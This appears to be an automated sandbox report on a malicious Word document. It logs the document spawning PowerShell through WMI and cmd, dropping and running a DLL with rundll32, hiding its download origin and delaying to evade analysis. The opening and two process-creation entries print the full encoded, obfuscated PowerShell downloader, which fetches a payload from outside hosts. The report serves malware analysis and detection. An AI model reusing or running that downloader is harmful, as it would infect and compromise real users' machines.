AGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100099ED LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
Source: Chpieog.dll.5.drStatic PE information: real checksum: 0x3f69f should be: 0x438a6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038B6 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004D55 push ecx; ret

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Hnzj\wmdqdo.qxuJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA461 FindFirstFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 00000007.00000002.2115892691.00000000003BB000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001180 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow